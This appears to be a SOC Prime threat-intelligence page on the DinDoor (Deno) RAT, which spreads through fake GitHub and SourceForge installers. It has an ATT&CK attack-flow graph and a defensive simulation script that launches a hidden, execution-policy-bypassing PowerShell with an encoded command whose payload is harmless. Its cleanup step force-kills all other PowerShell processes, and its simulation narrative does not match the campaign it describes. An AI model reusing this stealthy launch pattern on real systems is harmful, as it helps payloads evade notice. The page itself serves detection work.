SOC Prime Bias: Critical

27 May 2026 15:32 UTC
newspaper icon Malwarebytes

Fake software on GitHub and SourceForge distribute Deno RAT by Gabriele Orini

Author Photo
SOC Prime Team linkedin icon Follow
Fake software on GitHub and SourceForge distribute Deno RAT by Gabriele Orini
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

Threat actors are distributing fake installers and plug-ins for widely used software through GitHub and SourceForge to deliver a Deno-based backdoor known as DinDoor. The malware installs the Deno runtime through Scoop or WinGet, then launches a JavaScript RAT capable of stealing data, executing remote commands, and enabling peer-to-peer video streaming. Malicious MSI packages and PowerShell scripts are used to start the infection chain, while command-and-control traffic is carried over HTTP or WebSocket. The campaign also abuses compromised YouTube channels to drive victims toward the malicious repositories.

Investigation

Researchers reconstructed the full infection sequence, beginning with curl commands that downloaded an MSI file, followed by installer scripts that deployed Scoop, WinGet, and Deno before executing the DinDoor JavaScript loader. Their analysis documented the RAT’s capabilities, including system reconnaissance, browser and crypto wallet theft, VNC over WebSocket, and Edge-based peer-to-peer streaming. The team also extracted indicators such as domains, URLs, IP addresses, and command-line artifacts to support detection and threat hunting.

Mitigation

Organizations should download software only from official vendor websites and verify digital signatures before running any installer. Security teams should monitor for unusual use of Scoop and WinGet to install Deno, as well as unexpected MSI-based software deployment. Outbound traffic to the identified malicious domains and IP addresses should be blocked, and PowerShell or curl activity that downloads and runs files from untrusted sources should be closely inspected.

Response

Defenders should alert on msiexec launching files sourced from suspicious GitHub or SourceForge URLs, on Run registry keys that start deno.exe, and on network communication with the known command-and-control infrastructure. Affected hosts should undergo forensic review to locate dropped scripts, the Deno runtime, and any persistence mechanisms. Compromised systems should be isolated immediately, and all unauthorized Deno installations should be removed.

"graph TB %% Class definitions classDef technique fill:#99ccff classDef tool fill:#ffcc99 classDef operator fill:#ff9900 %% Attack steps as technique nodes step1_malicious_link["<b>Technique</b> – <b>T1204.001 User Execution: Malicious Link</b><br/>Victim clicks a malicious YouTube link that redirects to a counterfeit GitHub or SourceForge project"] class step1_malicious_link technique step1_content_injection["<b>Technique</b> – <b>T1659 Content Injection</b><br/>Compromised YouTube channels inject malicious URLs into video descriptions or comments"] class step1_content_injection technique step2_msiexec["<b>Technique</b> – <b>T1218.007 System Binary Proxy Execution: Msiexec</b><br/>Command downloads an MSI file and executes it via msiexec"] class step2_msiexec technique step3_installer_pkg["<b>Technique</b> – <b>T1546.016 Event Triggered Execution: Installer Packages</b><br/>PowerShell script uses Scoop or WinGet to install the Deno runtime"] class step3_installer_pkg technique step4_logon_script["<b>Technique</b> – <b>T1037.001 Boot or Logon Initialization Scripts: Logon Script</b><br/>Creates a Run registry key that launches the Deno backdoor at logon"] class step4_logon_script technique step5_reflective_load["<b>Technique</b> – <b>T1620 Reflective Code Loading</b><br/>Backdoor runs an evalu2011loop that fetches and executes JavaScript code entirely in memory"] class step5_reflective_load technique step6_c2["<b>Technique</b> – <b>T1102 Web Service</b> and <b>T1102.002 Bidirectional Communication</b><br/>Uses HTTP endpoints and a custom WebSocket VNC channel for command and control"] class step6_c2 technique step7_browser_creds["<b>Technique</b> – <b>T1555.003 Credentials from Password Stores: Web Browsers</b><br/>Stealer extracts saved browser passwords"] class step7_browser_creds technique step7_input_capture["<b>Technique</b> – <b>T1056 Input Capture</b><br/>Keylogging and form capture to obtain credentials"] class step7_input_capture technique step7_clipboard["<b>Technique</b> – <b>T1115 Clipboard Data</b><br/>Collects clipboard contents that may contain sensitive data"] class step7_clipboard technique step8_browser_discovery["<b>Technique</b> – <b>T1217 Browser Information Discovery</b><br/>Gathers cryptocurrency wallet files, browser data and screenshots"] class step8_browser_discovery technique step9_exfil["<b>Technique</b> – <b>T1011 Exfiltration Over Other Network Medium</b><br/>Transmits collected data through the same HTTP/WebSocket channels"] class step9_exfil technique step10_process_injection["<b>Technique</b> – <b>T1055.005 Process Injection: Thread Local Storage</b><br/>Injects malicious code into legitimate processes using TLS"] class step10_process_injection technique step11_indirect_exec["<b>Technique</b> – <b>T1202 Indirect Command Execution</b><br/>Leverages msiexec to proxy execution of additional payloads"] class step11_indirect_exec technique %% Optional tool nodes tool_msiexec["<b>Tool</b> – <b>Name</b>: msiexec<br/><b>Description</b>: Windows Installer executable used for proxy execution"] class tool_msiexec tool tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Description</b>: Scripting environment used to drive installer packages"] class tool_powershell tool tool_deno["<b>Tool</b> – <b>Name</b>: Deno<br/><b>Description</b>: Runtime that hosts the JavaScript backdoor"] class tool_deno tool %% Connections showing the attack flow step1_malicious_link –>|leads to| step2_msiexec step1_content_injection –>|supports| step2_msiexec step2_msiexec –>|uses| tool_msiexec step2_msiexec –>|triggers| step3_installer_pkg step3_installer_pkg –>|uses| tool_powershell step3_installer_pkg –>|installs| tool_deno step3_installer_pkg –>|enables| step4_logon_script step4_logon_script –>|establishes| step5_reflective_load step5_reflective_load –>|provides| step6_c2 step6_c2 –>|facilitates| step7_browser_creds step6_c2 –>|facilitates| step7_input_capture step6_c2 –>|facilitates| step7_clipboard step7_browser_creds –>|feeds into| step8_browser_discovery step7_input_capture –>|feeds into| step8_browser_discovery step7_clipboard –>|feeds into| step8_browser_discovery step8_browser_discovery –>|sent via| step9_exfil step9_exfil –>|uses channel from| step6_c2 step5_reflective_load –>|enables| step10_process_injection step10_process_injection –>|escalates privileges for| step11_indirect_exec step11_indirect_exec –>|executes| step2_msiexec class step1_malicious_link,step1_content_injection,step2_msiexec,step3_installer_pkg,step4_logon_script,step5_reflective_load,step6_c2,step7_browser_creds,step7_input_capture,step7_clipboard,step8_browser_discovery,step9_exfil,step10_process_injection,step11_indirect_exec technique class tool_msiexec,tool_powershell,tool_deno tool "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An attacker has gained initial foothold via a malicious CMD script delivered in a phishing attachment. To maintain stealth, the script launches PowerShell with a hidden window, disables the execution policy, and runs a base64‑encoded payload that downloads and runs a second‑stage payload. The exact command line matches the rule’s three flagged substrings, ensuring detection.

    1. Stage 1 – CMD launcher (simulated by the tester):

       @echo off
 start "" powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand %payload%

    2. Stage 2 – PowerShell payload (base64‑encoded, benign for test):

       $cmd = 'Write-Output "Malicious simulation executed"'
 $bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
 $b64 = [Convert]::ToBase64String($bytes)
 echo $b64   # Insert this value as %payload% in the batch file

  • Regression Test Script: The script below automates the entire flow, generating the encoded command, launching PowerShell with the required flags, and then pausing briefly to let the SIEM ingest the event.

    # -------------------------------------------------
# Regression Test – PowerShell Hidden + Bypass EP
# -------------------------------------------------
# 1) Build a harmless payload (Write‑Output)
$payload = 'Write-Output "Malicious simulation executed"'

# 2) Encode payload in base64 (Unicode encoding, as PowerShell expects)
$bytes = [System.Text.Encoding]::Unicode.GetBytes($payload)
$b64   = [Convert]::ToBase64String($bytes)

# 3) Launch PowerShell with the exact flag set required by the Sigma rule
$psCmd = @(
    'powershell.exe',
    '-NoProfile',
    '-ExecutionPolicy', 'Bypass',
    '-WindowStyle', 'Hidden',
    '-EncodedCommand', $b64
) -join ' '

Write-Host "Executing:`n$psCmd"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile","-ExecutionPolicy","Bypass","-WindowStyle","Hidden","-EncodedCommand",$b64 -WindowStyle Hidden

# 4) Wait for logging to propagate (adjust as needed)
Start-Sleep -Seconds 10
Write-Host "Simulation complete – check SIEM for detection."

  • Cleanup Commands: Remove any temporary files (none created here) and ensure no lingering PowerShell processes remain.

    # Kill any stray PowerShell processes spawned by the test (excluding the current session)
Get-Process -Name powershell | Where-Object { $_.Id -ne $PID } | Stop-Process -Force
Write-Host "Cleanup complete."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free